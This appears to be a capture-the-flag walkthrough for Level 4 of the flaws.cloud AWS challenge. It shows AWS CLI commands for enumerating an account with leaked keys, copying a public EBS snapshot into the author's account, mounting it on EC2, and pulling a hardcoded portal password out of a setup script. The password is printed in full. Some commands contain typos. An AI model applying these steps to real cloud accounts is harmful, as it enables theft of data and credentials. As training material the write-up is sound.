# Level 4 For Level 4, we are told that we need to access a web page running on an EC2.

First, we need the account ID, which we can get using the AWS key from Level 3. Using the `get-caller-identity` command also tells you the name of the account. In this case, the name is "backup". ``` aws sts get-caller-identity --profile flaws3 ```

Run `host` command to find that the site is hosted in US-West-2. ``` host 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud ```

Another way of doing this is with `nslookup` ``` nslookup d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud ```

Since we determined that this account is named "backup". To see if there are any snapshots associated with the account, run the command below. ``` aws ec2 describe-snapshots --profile flaws3 ```

Since we have found a list of snapshots, let's try to drill down. ``` aws -profile flaws3 ec2 describe-snapshots --owner-id 975426262029 ``` If we run this command, we do not have access since we are not in the correct AZ.

To change the region, we need to reconfigure the profile: `aws configure --profile flaws3` and change the region name to us-west-2 Run the command again. This time it returns with the snapshot.

Use the command below to check the permissions of the volume. ``` aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile flaws3 ``` Within your AWS account, create the volume using the snapshot. *Note: I am using the profile (flaws) that I created in the previous levels that is tied to my AWS account.* ``` aws --profile flaws ec2 create-volume --availability-zone us-west-2c --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 ```

Ensure that the volume is created by running the following command. ``` aws –profile flaws ec2 describe-volumes --region us-west-2 ```

Within the console, we can see that the volume was created.

An EC2 instance will need to be created so that we can mount the snapshot. Ensure to generate a key pair. For this instance, I used Ubuntu.

Once the EC2 key is downloaded, I moved the .pem file to my Desktop. ``` mv ~/Downloads/flaws_lab.pem ~/Desktop ```

We’ll change the permissions on the file. ``` chmod 400 flaws_lab.pem ```

Once the EC2 is up and running, go to the snapshot and attach it to the new EC2 instance.

Confirm that it is attached.

Let’s SSH into the EC2 instance. You can find instructions [here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-linux-inst-ssh.html). ssh follows this structure: `ssh -i /path/key-pair-name.pem instance-user-name@instance-public-dns-name` ``` ssh -i flaws_lab.pem ```

Once in the instance, let’s list the drives. We will be mounting "xvdf1". ``` lsblk ```

Create a new directory for this drive. ``` sudo mkdir /mnt/flaws ```

Mount the drive. ``` sudo mount /dev/xvdf1 /mnt/flaws mount ```

Navigate to the directory and list the contents. We’ll check out the home folder to see what users are on the volume. It looks like Ubuntu is the only user. If we go into the Ubuntu directory, we can see two files. setupNginx.sh stands out since it is a bash script. Let’s read it using the cat command to see what we can find. Looks like there are hardcoded credentials.

By using the credentials we just found (flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M), we successfully logged into the web portal.